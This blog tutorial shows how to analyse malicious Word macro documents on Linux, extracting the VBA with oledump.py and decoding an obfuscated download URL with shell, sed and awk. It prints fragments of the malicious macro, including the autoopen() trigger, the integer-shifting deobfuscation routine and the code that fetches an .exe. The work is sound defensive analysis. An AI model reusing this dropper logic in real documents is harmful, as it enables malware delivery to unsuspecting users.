… and without touching Perl I might add. So, someone has just handed you a collection of Microsoft Word documents that they believe are malicious and you’re keen to investigate them to see if you can get your hands on some more malware to analyse. Here is how you can analyse Microsoft Word documents in a Linux environment, without using Microsoft Word (and without using Perl).
Before I start, I’ll apologise for the length of this post, but I kept finding more stuff that I could do.
Firstly, let’s see what we’ve got:
[code]
$ ls -l
total 1612
-rw-r--r-- 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(10).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(11).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(12).doc
-rw-r--r-- 1 malware musings 101376 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(13).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(14).doc
-rw-r--r-- 1 malware musings 101376 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(15).doc
-rw-r--r-- 1 malware musings 101376 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(16).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(17).doc
-rw-r--r-- 1 malware musings 101376 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(18).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(19).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:21 copier@malwaremusings.com_20160129_084903(1).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:21 copier@malwaremusings.com_20160129_084903(3).doc
-rw-r--r-- 1 malware musings 101376 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(4).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(5).doc
-rw-r--r-- 1 malware musings 101376 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(6).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(8).doc
-rw-r--r-- 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(9).doc
[/code]
Right. Notice that a number of them are the same size as each other, so they could be the same file. Let’s use SHA256 hashes to compare them:
[code]
$ sha256sum -b * |cut -d' ' -f1 |sort |uniq -c
5 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1
6 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01
6 a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823
[/code]
Okay. So we have three different files and roughly the same number of each. Let’s cull our collection a bit so that we only have unique files:
[code]
$ mkdir `sha256sum -b *.doc |cut -d' ' -f1 |sort |uniq`
$ sha256sum -b *.doc |sort |sed 's/ \*/ /' |while read hash filename; do
if [ "$hash" != "$prev" ]; then
mv -i "$filename" "$hash"/
prev="$hash"
fi
done
[/code]
There are two good tools that I know of for looking at Microsoft Office files: Didier Stevens’ oledump and Decalage’s oletools. Oletools contains the olevba.py script, which will do some useful analysis of the VB macro code; however, it spits all of the VB code and analysis info out together. This is okay for reading through it and is, in fact, what I used the first time I did this work. Now that I know what I’m looking at, however, I’ll use Didier’s oledump.py, which will allow me to extract the different pieces of macro code to separate files, making it easier to script.
You could just as easily take either approach, but the oletools approach will need some manual (well, it could be scripted) work on its output file to be able to feed it in to the other commands below.
Moving on, let’s have a look at the first document (SHA256 hash 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1):
[code]
$ oledump.py copier@malwaremusings.com_20160129_084903\(12\).doc
1: 113 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 4096 '1Table'
5: 584 'Macros/PROJECT'
6: 119 'Macros/PROJECTwm'
7: 97 'Macros/UserForm1/\x01CompObj'
8: 291 'Macros/UserForm1/\x03VBFrame'
9: 131 'Macros/UserForm1/f'
10: 184 'Macros/UserForm1/o'
11: M 26055 'Macros/VBA/Module1'
12: M 28346 'Macros/VBA/Module2'
13: M 1277 'Macros/VBA/ThisDocument'
14: m 1160 'Macros/VBA/UserForm1'
15: 7836 'Macros/VBA/_VBA_PROJECT'
16: 1607 'Macros/VBA/__SRP_0'
17: 114 'Macros/VBA/__SRP_1'
18: 264 'Macros/VBA/__SRP_2'
19: 103 'Macros/VBA/__SRP_3'
20: 886 'Macros/VBA/dir'
21: 4142 'WordDocument'
[/code]
That output is telling us that items/streams 11 – 14 (inclusive) contain VB macro code. Let’s extract it:
[code]
$ oledump.py copier@malwaremusings.com_20160129_084903\(12\).doc |grep ": [Mm]" |tr -s " " |cut -d' ' -f2,5 |tr -d "':" |sed 's# .*/# #' |while read stream file; do
/usr/local/oledump/oledump.py -s "$stream" -v copier@malwaremusings.com_20160129_084903\(12\).doc > "$file"
done
$ ls -l
total 140
-rw-r--r-- 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(12).doc
-rw-r--r-- 1 malware musings 17262 Feb 14 13:21 Module1
-rw-r--r-- 1 malware musings 18121 Feb 14 13:21 Module2
-rw-r--r-- 1 malware musings 330 Feb 14 13:21 ThisDocument
-rw-r--r-- 1 malware musings 342 Feb 14 13:21 UserForm1
[/code]
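If that pipeline looks a bit dense, here is a sketch of the field extraction on its own, fed a single listing line. The sample line, and in particular the leading space before the index, is my assumption about how oledump.py pads its index column (the listing above has had its whitespace flattened), and parse_listing is just a name made up for this illustration.

```shell
# parse_listing: read oledump.py listing lines on stdin and print
# "<stream number> <module name>" for each stream flagged M or m.
parse_listing() {
    grep ": [Mm]" |       # keep only streams flagged as containing macros
    tr -s " " |           # squeeze runs of spaces so cut(1) sees single delimiters
    cut -d' ' -f2,5 |     # field 1 is empty (leading space): keep index and name
    tr -d "':" |          # drop the quotes and the colon after the index
    sed 's# .*/# #'       # strip the storage path, leaving just the module name
}

# Assumed sample line: note the leading space before the index.
printf "%s\n" " 11: M   26055 'Macros/VBA/Module1'" | parse_listing
```

The cut(1) field numbers only work because of that leading space: it makes field 1 empty, so the index is field 2 and the quoted stream name is field 5. If your version of oledump.py pads its output differently, the field numbers will need adjusting.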
Okay, so we have four files (streams/items 11 – 14) containing VB macro code. UserForm1 is just Attribute statements setting various attributes, so we’ll leave that alone. ThisDocument also contains a few Attribute statements, but also contains a function called autoopen():
[code]
$ more ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
CargarFichProc "/"
End Sub
[/code]
That is how the macro code gets control: ‘When a document is opened, an AutoOpen macro runs if the AutoOpen macro is saved as part of that document or if the macro is saved as part of the template on which the document is based.’ (Description of behaviours of AutoExec and AutoOpen macros in Word).
The AutoOpen() (or autoopen() in this case, as VBA isn’t case sensitive when it comes to identifier names) function calls the CargarFichProc() function with ‘/’ as a parameter. Let’s find where that function is defined:
[code]
$ grep "CargarFichProc" *
Binary file copier@malwaremusings.com_20160129_084903(12).doc matches
Module2:Public Sub CargarFichProc(NombreFichero As String)
ThisDocument:CargarFichProc "/"
[/code]
The function is defined in the Module2 code, and called from the code in ThisDocument (which we already knew as that is the file that we were just looking at).
Looking at Module2 and searching for the CargarFichProc() function, we see a lot of code which, at first glance, doesn’t appear to be doing anything useful (or to put it another way, ‘beating about the bush’ as we say in this neck of the woods, a bit like I’m doing in these parentheses):
[code]
Public Sub CargarFichProc(NombreFichero As String)
Dim f As Integer
Dim Buffer As String
Dim Cadena As String
Dim i As Integer
Dim Aux As Integer
Dim Fallo As Boolean
Fallo = False
bHayNORMA = False
bHayNORMAC = False
bHaySNIFTD = False
bHayEXPAND = False
bHaySFIFT = False
bHayCNIFT = False
bHayPNIFT = False
bHayPNIFU = False
bHayFrecs = False
GoTo perd
For i = 0 To UBound(sProc) Step 1
sProc(i) = Unchecked
Next i
sProc(0) = CharSinCargar
sProc(3) = CharSinCargar
For i = 0 To UBound(sSNIFTD_EXPAND) Step 1
sSNIFTD_E.XPAND(i) = CharSinCargar
Next i
sSNIFTD_E.XPAND(10) = Unchecked
For i = 0 To UBound(sSFIFT) Step 1
sSF.IFT(i) = CharSinCargar
Next i
[/code]
It just so happens that I’ve seen VB code do this before, and after spending ages tracing through it all to figure out what a number of the functions did, I started tracing execution from the AutoOpen() function and realised that a lot of the code is skipped by using GoTo statements, or other control flow statements, and never actually runs!
Now I notice in that extract of CargarFichProc() shown above, that there is a ‘GoTo perd’ statement. Let’s do a test and display all of the lines that either contain a GoTo statement, or a label:
[code]
$ cat Module2 |tr -d "\015" |grep "^[ ]*GoTo\|:$"
GoTo perd
perd:
GoTo perd1
SalirCargarProc:
ManipularErrorCargarProc:
perd1:
GoTo perd
perd:
GoTo perd2
perd2:
GoTo perd3
perd3:
GoTo perd4
SalirCargarProc:
ManipularErrorCargarProc:
perd4:
[/code]
Note the use of the tr(1) command to delete carriage return characters (character 13, or \015 — 13 decimal is 15 octal). We need to do this because these files came from a Windows environment which uses a subtly different end-of-line convention to UNIX. Windows (and MS-DOS) ends lines with two characters — a carriage return (ASCII character 13) and a line feed (ASCII character 10). UNIX, on the other hand, ends lines with a single line feed character.
Consequently UNIX doesn’t recognise a CR character as the end of a line, but as just another character on the line, so it sees a number of lines with a CR character as the last character on each line. This means that when we ask grep to show us lines ending in ‘:’, it doesn’t show anything because as far as grep is concerned the lines have a CR character on the end of them, not a ‘:’ character.
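Here is a small sketch of that effect, using two made-up lines with Windows line endings rather than the real macro file. The sample() function is just a stand-in for illustration.

```shell
# Two VB-style lines with Windows (CR LF) line endings.
sample() { printf 'GoTo perd\r\nperd:\r\n'; }

# Count the lines ending in ':' before and after deleting the CR characters.
# grep -c prints the number of matching lines (and exits non-zero when it is 0).
sample | grep -c ':$' || true
sample | tr -d '\015' | grep -c ':$'
```

The first count should be 0, because the last character on the label line is the CR, and the second should be 1 once tr(1) has removed it.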
Since all of those labels appear after their corresponding GoTo statements in the VB file, we can take one of two approaches here. We can open the file in a text editor and scroll through it deleting the lines in between each GoTo statement and its corresponding label, or we can take the more interesting approach and try to script it. Again, we’re using tr(1) to remove the carriage return (CR) characters. Scripting it will help us if we see more of this type of file, like if the other two Word documents that we have to look at do a similar thing:
[code]
$ cat Module2 |tr -d "\015" |awk '
/^[ ]*GoTo[ ]/ {
  # goto statement: extract label
  dstlabel = $2;
  dontprint = 1;
}
(dontprint == 0) {
  print;
}
/:$/ {
  # found label
  label = $0;
  sub(":$","",label);
  if (label == dstlabel) dontprint = 0;
}
' > Module2.tidy
$ ls -l Module2*
-rw-r--r-- 1 malware musings 18121 Feb 14 13:21 Module2
-rw-r--r-- 1 malware musings 2077 Feb 14 18:50 Module2.tidy
[/code]
As you can see, that has drastically reduced the size of that VB macro file!
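To see what the filter does on a small scale, here it is wrapped in a function and run over six made-up lines. The skip_goto name and the sample input are mine, purely for illustration; the awk logic is the same as above.

```shell
# skip_goto: the awk filter from above, wrapped in a function that reads stdin.
skip_goto() {
    tr -d '\015' | awk '
        /^[ ]*GoTo[ ]/ { dstlabel = $2; dontprint = 1 }   # start skipping at a GoTo
        (dontprint == 0) { print }                        # print only when not skipping
        /:$/ {                                            # a label line
            label = $0
            sub(":$", "", label)
            if (label == dstlabel) dontprint = 0          # resume after the target label
        }'
}

# Made-up sample: the assignment to x can never run.
printf '%s\n' 'Sub demo()' 'GoTo perd' 'x = 1' 'perd:' 'y = 2' 'End Sub' | skip_goto
```

Only the Sub line, the assignment to y, and the End Sub line should survive. Note that the GoTo and the label are dropped as well, and that this only works because every label comes after its GoTo and starts in the first column; a backwards jump or an indented label would leave the filter skipping to the end of the file.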
Let’s just set that aside for the moment, and run the same tidying up script on Module1. If we repeat the above set of commands on Module1 we get:
[code]
$ ls -l Module1*
-rw-r--r-- 1 malware musings 17262 Feb 14 13:21 Module1
-rw-r--r-- 1 malware musings 5984 Feb 14 18:53 Module1.tidy
[/code]
Having a quick browse through Module1.tidy we see a few key things:
[code]
i = MsgBox("No se pudo guardar el fichero correctamente." & _
vbNewLine & sPathProceso, _
vbOKOnly + vbCritical, "ERROR PROCESADO DE INCERTIDUMBRES")
…
Public Sub ValidarProc(NombreFichero As String)
[/code]
Plus a few other things that look like validation and error printing code. Let’s have a bit of fun and plug that error message in to a language guessing web site shall we? I reckon it sounds like Spanish, or something like that.
Google Translate has translated the first sentence from that MsgBox() statement to ‘Could not save the file correctly‘, and also believes it to be Spanish.
Now that we’ve got that out of the way, let’s go back to Module2 (which contains the function called from the autoopen() function) and see what else we want to try and work out.
A quick scan shows a few interesting things. We have a function, AddFieldToField(Variant,Integer), that is performing some calculation inside a loop and then returning the result. We have some object creation going on, an Array of integers, a call to AddFieldToField(), the name of a .exe file, and some interesting sounding function calls:
[code]
Public Function AddFieldToField(ShaBADA1_9() As Variant, ShaBADA1_10 As Integer) As String
Dim ShaBADA1_8 As Integer
Dim uncunctunc2_1 As String
uncunctunc2_1 = ""
For ShaBADA1_8 = LBound(ShaBADA1_9) To UBound(ShaBADA1_9)
uncunctunc2_1 = uncunctunc2_1 & Chr(ShaBADA1_9(ShaBADA1_8) - 8854 - ShaBADA1_10 - 500 - 3 * ShaBADA1_10 - 500)
Next ShaBADA1_8
AddFieldToField = uncunctunc2_1
End Function
…
Set ShaBADA1_1 = CreateObject(mandata(0))
Set ShaBADA1_2 = CreateObject(mandata(1))
Set ShaBADA1_6 = CreateObject(mandata(2))
Set hokuk = CreateObject(mandata(3))
Set ShaBADA1_3 = hokuk.Environment(mandata(4))
Dim ShaBADA1_7() As Variant
ShaBADA1_7 = Array(10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133, 10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 10135, 10154, 10135)
ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
ShaBADA1_1.Send
ShaBADA1_4 = ShaBADA1_3(mandata(6))
ShaBADA1_5 = ShaBADA1_4 + "\perdoma.exe"
[/code]
My guess would be that the Array of integers is hiding something. Especially when the next line passes the Array to AddFieldToField(), which is a function (don’t let the name throw you — it’s not really a field) that performs calculations within a loop and returns a value. Is AddFieldToField() a deobfuscation function?
That loop inside AddFieldToField() looks like a classic indexing loop that performs a calculation on each element of whatever it is passed, which is just what it would need to do to turn that Array of integers in to something more meaningful. Let’s look in to it.
I’m going to try to save a bit of time by assuming that LBound() and UBound() return the lowest and highest indexes of the Array that they are passed, as that would match what I’m expecting the loop to be doing (grabbing each element of the Array in turn). If that doesn’t work out for us, then I’ll go back and see what LBound() and UBound() actually do.
[code]
uncunctunc2_1 = ""
For ShaBADA1_8 = LBound(ShaBADA1_9) To UBound(ShaBADA1_9)
uncunctunc2_1 = uncunctunc2_1 & Chr(ShaBADA1_9(ShaBADA1_8) - 8854 - ShaBADA1_10 - 500 - 3 * ShaBADA1_10 - 500)
Next ShaBADA1_8
[/code]
That For loop then is taking each integer from the Array passed to AddFieldToField() (ShaBADA1_9) in turn, performing a calculation, converting the result to a character with Chr(), and appending it to an output string (uncunctunc2_1) which was initially the empty string.
Let’s take the first integer from the Array (10138) and do the same calculation substituting the second parameter passed to AddFieldToField() (45) for ShaBADA1_10, and see what we get:
[code]
$ expr 10138 - 8854 - 45 - 500 - 3 \* 45 - 500
104
[/code]
Smashing. ASCII ‘A’ is 65, and adding 32 (the difference between upper case and lower case characters, bit 5) gives 97 for ‘a’, so the lower case letters run from 97 to 97 + 25 = 122. 104 is within that range, hence it looks like a lower case letter of the alphabet. Checking the ascii(7) man page (to save counting letters) we see that it is an ‘h’ character. Looking promising. Let’s work on extracting the integers from the Array:
[code]
$ grep "Array" Module2.tidy |sed 's/.*(\(.*\))/\1/'
10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133, 10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 10135, 10154, 10135
[/code]
and remove the commas with our good friend tr(1) again:
[code]
$ grep "Array" Module2.tidy |sed 's/.*(\(.*\))/\1/' |tr -d ","
10138 10150 10150 10146 10092 10081 10081 10094 10138 10139 10134 10134 10135 10144 10096 10080 10133 10145 10143 10081 10151 10087 10088 10137 10136 10084 10134 10081 10141 10089 10088 10140 10087 10138 10137 10080 10135 10154 10135
[/code]
Splendid — we now have a list of integers to perform the calculation on. Now we could potentially do the calculation using the expr(1) command, like we did above, but then we’d have to dick around and convert the output to octal and backslash escape it, then convince an echo command to translate the backslash escapes.
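For comparison, the expr(1) route might look something like this for a single integer. It is only a sketch to show the octal juggling involved; decode_one is a made-up name, and the arithmetic is copied from the VB code.

```shell
# decode_one VALUE KEY: decode a single obfuscated integer using only
# expr(1) and printf(1).
decode_one() {
    code=$(expr "$1" - 8854 - "$2" - 500 - 3 \* "$2" - 500)
    # printf(1) has no "character from decimal code" conversion, so turn the
    # code into a three digit octal escape (\ooo) and let printf expand that.
    printf "\\$(printf '%03o' "$code")"
}

decode_one 10138 45; echo
```

That works for one integer, but it spawns a couple of processes per character and still needs a loop wrapped around it.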
An easier approach is to use awk(1), as it can do the calculation and output the characters for us:
[code]
$ grep "Array" Module2.tidy |sed 's/.*(\(.*\))/\1/' |tr -d "," |awk '
{
  for (i = 1;i <= NF;i++) {
    printf("%c",$i - 8854 - 45 - 500 - 3 * 45 - 500);
  }
  printf("\n");
}'
http://<hidden>.com/u56gf2d/k76j5hg.exe
[/code]
Bingo — I don’t know about you, but I’d now be expecting this macro to initiate a download from that (well, the original one) URL.
After repeating the oledump VB macro code extraction and tidying up commands on the other two Word documents, we can do a quick check to see if they have the same macro code in them:
[code]
$ sha256sum -b */Module1
4cf89352fb49ab1fb96da826d72d4add50ac78b3edf5a701129cc8eb92c2d86c *003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module1
09ee2e21efe038b230f685ac737d6aac5b380293146322004200cf6472a70a15 *66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module1
4cf89352fb49ab1fb96da826d72d4add50ac78b3edf5a701129cc8eb92c2d86c *a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module1
$ sha256sum -b */Module2
10cd806fb2b3717e549fb017dd711f4d49fb8bfe340746cc39039d3495fdc225 *003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module2
2c9db80504019c584c6c687ca861244cef3be0ffb0eaaf6259570ae5f56f94fd *66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module2
60ac3e8e06b1c8019f63ea2ab7116216b0b3635d45ec485e74a87d8c79f8d1fb *a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module2
[/code]
No they don’t. The next obvious question then, is how do they differ?:
[code]
$ diff 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module1 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module1
622a623,624
>
>
$ diff 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module2 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module2
495,496c495,496
< ShaBADA1_7 = Array(10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133, 10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 10135, 10154, 10135)
< ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
---
> ShaBADA1_7 = Array(10146, 10158, 10158, 10154, 10100, 10089, 10089, 10102, 10146, 10147, 10142, 10142, 10143, 10152, 10104, 10088, 10142, 10143, 10089, 10159, 10095, 10096, 10145, 10144, 10092, 10142, 10089, 10149, 10097, 10096, 10148, 10095, 10146, 10145, 10088, 10143, 10162, 10143)
> ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 47), False
653a654,655
>
>
$ diff 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module1 a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module1
623,624d622
<
<
$ diff 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module2 a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module2
495,496c495,496
< ShaBADA1_7 = Array(10146, 10158, 10158, 10154, 10100, 10089, 10089, 10102, 10146, 10147, 10142, 10142, 10143, 10152, 10104, 10088, 10142, 10143, 10089, 10159, 10095, 10096, 10145, 10144, 10092, 10142, 10089, 10149, 10097, 10096, 10148, 10095, 10146, 10145, 10088, 10143, 10162, 10143)
< ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 47), False
---
> ShaBADA1_7 = Array(10118, 10130, 10130, 10126, 10072, 10061, 10061, 10074, 10118, 10119, 10114, 10114, 10115, 10124, 10076, 10060, 10125, 10128, 10117, 10061, 10131, 10067, 10068, 10117, 10116, 10064, 10114, 10061, 10121, 10069, 10068, 10120, 10067, 10118, 10117, 10060, 10115, 10134, 10115)
> ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 40), False
654,655d653
<
<
[/code]
Apart from the second sample having a couple of extra blank lines in it, Module1 doesn’t differ.
Module2 however, does differ, but only by a couple of lines (again ignoring the extra blank lines in the second sample), namely the Array line and the call to AddFieldToField(). Those differences are only changes to the integers used in the Array and in the second parameter to AddFieldToField() (the second parameter, remember, was used in the deobfuscation calculation).
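As a sanity check on that reading, the calculation in AddFieldToField() collapses to value - 9854 - 4 * key (8854 + 500 + 500 is 9854, and the key is subtracted once and then three more times). That would explain why the Arrays look like shifted copies of each other: going from a key of 45 to a key of 47 raises every integer by 8 (10138 becomes 10146). Here is a sketch using that simplified form on the first seven integers of two of the Arrays; decode is a made-up helper name.

```shell
# decode KEY N1 N2 ...: apply the simplified form of the AddFieldToField()
# calculation (value - 9854 - 4 * key) to each integer and print the result.
decode() {
    key=$1; shift
    for n in "$@"; do
        printf '%s\n' "$n"
    done | awk -v key="$key" '{ printf("%c", $1 - 9854 - 4 * key) } END { printf("\n") }'
}

# First seven integers from the first sample (key 45) and the third (key 40).
decode 45 10138 10150 10150 10146 10092 10081 10081
decode 40 10118 10130 10130 10126 10072 10061 10061
```

Both calls should print the same seven characters, the start of a URL, which suggests that only the key and the domain change between samples.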
You know, I reckon we could automate this. We need to grab the line declaring the Array, and also the call to AddFieldToField(). It turns out that a simple grep Array command is enough to extract only the Array declaration. If, however, we try grep AddFieldToField( then we’ll also get the function declaration, which we don’t want:
[code]
$ grep "AddFieldToField(" Module2.tidy
Public Function AddFieldToField(ShaBADA1_9() As Variant, ShaBADA1_10 As Integer) As String
ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
[/code]
Let’s refine that a tad. We can see that the call to AddFieldToField() is preceded by a ‘.Open’ (a call to the Open method of some object). Let’s use that to extract only the AddFieldToField() call (we won’t use the object name as that is likely to have been pseudo-randomly generated to make it different in other documents), and then combine those two regular expressions in to one grep(1) command:
[code]
$ grep "Array\|Open.*AddFieldToField(" Module2.tidy
ShaBADA1_7 = Array(10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133, 10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 10135, 10154, 10135)
ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
[/code]
Brilliant. That gets us the two lines (and only the two lines) that we wanted. Now to get the pertinent data in to a format that we can feed to awk(1) to do the calculating and printing.
[code]
$ grep "Array\|Open.*AddFieldToField(" Module2.tidy |sed '/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g'
10138 10150 10150 10146 10092 10081 10081 10094 10138 10139 10134 10134 10135 10144 10096 10080 10133 10145 10143 10081 10151 10087 10088 10137 10136 10084 10134 10081 10141 10089 10088 10140 10087 10138 10137 10080 10135 10154 10135 45
[/code]
Now I’m thinking that I should probably explain that sed(1) command! It is really three sed(1) commands separated by a ‘;’. If we break them out then I can explain each sed(1) command separately.
[code]
/Array(/N
s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/
s/, */ /g
[/code]
The first line applies the ‘N’ command (append the next line of input to the pattern space) to any line that matches the regular expression ‘Array(‘. This works because we only have two lines of input from grep(1), and they are always in the same order — the Array declaration and then the function call — and what it does is it appends the line containing the function call to the line containing the Array declaration, after inserting an embedded newline character (the ‘\n’ that you can see in the ‘s’ command).
The second line is the sed(1) ‘s’ command (substitute), and that is applied to the pattern space (a sed(1) construct — man sed for more information) which is now the Array declaration line followed by an embedded newline character and the line containing the AddFieldToField() call.
The ‘s’ command removes everything before the ‘Array(’ part of the Array declaration, everything between the ‘)’ ending the Array declaration and the second parameter of the AddFieldToField() call, and everything after that second parameter. Note that this includes the embedded newline inserted by the ‘N’ command.
Now, I didn’t think that ‘.’ would match the embedded newline; I thought that it had to be matched explicitly with a ‘\n’. However, the above sed(1) command still works if I take the ‘\n’ out, which makes me wonder if this behaviour (a ‘.’ matching an embedded newline) is a GNU extension. I’ve left the ‘\n’ in because I’m reasonably sure that some sed(1) implementations (for instance, sed(1) on Solaris) require the embedded newline to be explicitly matched with a ‘\n’.
The ‘\([^)]*\)’ construct inside the Array declaration will match zero or more (‘*’) characters (‘[…]’) that aren’t (‘^’) a closing parenthesis (‘)’); that is, it’ll match the integers, commas, and spaces in between the ‘()’ in the Array(…) statement.
The ‘[^,]*,’ construct matches the first parameter (zero or more occurrences of a non ‘,’ character, followed by a ‘,’) to AddFieldToField(), with the ‘\([0-9]*\)’ matching the second parameter (zero or more occurrences of a digit). The outer escaped (‘\’) parentheses allow us to reference the enclosed matching text on the right hand side by using \1, \2, \3, etc., because, like the integers in the Array declaration, we want to keep this text.
So the whole pattern space is then replaced with the values represented by \1 and \2, which are the grouped (between the ‘\(‘ and ‘\)’) regular expressions on the left hand side (the text between the first and second ‘/’ characters) of the ‘s’ command. In this case they represent the string of integers in the Array declaration, and the integer passed to the AddFieldToField() function — everything that we need to deobfuscate the Array — and they are now the entire contents of the pattern space.
The third sed(1) command simply replaces each comma, along with any spaces following it, with a single space. This tidies the data up so that we can post-process it more easily. Speaking of which, here’s the moment that you’ve all been waiting for: the deobfuscation (it’s like the part at the end of Scooby Doo episodes where they unmask the villain, who would then inevitably exclaim that they would have got away with it if it hadn’t been for those meddling kids).
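If you want to poke at those three sed(1) commands in isolation, here is a sketch that feeds them two made-up lines of the same shape as the real ones. The variable names in the sample input (nums, obj, verb) and the extract_fields wrapper are hypothetical; the sed(1) script itself is unchanged.

```shell
# extract_fields: read an Array line followed by an AddFieldToField() call
# on stdin and print the integers followed by the key, space separated.
extract_fields() {
    sed '/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g'
}

# Made-up input with an extra space after one comma to exercise the tidy-up.
printf '%s\n' \
    'nums = Array(10138, 10150,  10150)' \
    'obj.Open verb, AddFieldToField(nums, 45), False' | extract_fields
```

The two lines should come out as a single line holding the three integers followed by the key, which is the shape that the awk(1) script expects: every field except the last is data, and the last field is the key.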
Now that we have our Array integers and the second parameter passed to the AddFieldToField() call, we can perform the calculation from the original VB script and spit the deobfuscated string out character by character. Let’s take what we have so far, and add an awk(1) script on the end to take the data output from sed(1), perform the deobfuscation calculation, and spit out the result:
[code]
$ grep "Array\|Open.*AddFieldToField(" Module2.tidy |sed '/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g' |awk '
{
  for (i = 1;i < NF;i++) {
    printf("%c",$i - 8854 - $NF - 500 - 3 * $NF - 500);
  }
  printf("\n");
}'
http://<hidden>.com/u56gf2d/k76j5hg.exe
[/code]
… and thankfully it is the same as when we extracted it manually earlier.
Now that we have scripted the extraction and deobfuscation methods we can run the same script on the other samples by returning to the directory in which we created a subdirectory per sample to extract the macro code:
[code]
$ grep "Array\|Open.*AddFieldToField(" */Module2.tidy |sed '/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g' |awk '
{
  for (i = 1;i < NF;i++) {
    printf("%c",$i - 8854 - $NF - 500 - 3 * $NF - 500);
  }
  printf("\n");
}'
http://<hidden>.com/u56gf2d/k76j5hg.exe
http://<hidden>.de/u56gf2d/k76j5hg.exe
http://<hidden>.org/u56gf2d/k76j5hg.exe
[/code]
Now, to make it even more useful, let’s put the whole lot together. That way we can just pass it similar Word documents and have it extract URLs for us. Here’s a complete script:
[code]
#!/bin/sh
seq=0
# "$@" keeps each file name intact, even if it contains spaces
for docfile in "$@"; do
  SHA256="`sha256sum -b \"$docfile\" |cut -d' ' -f1`"
  TMPDIR="$SHA256-`date '+%s'`-$$-$seq"
  seq="`expr $seq + 1`"
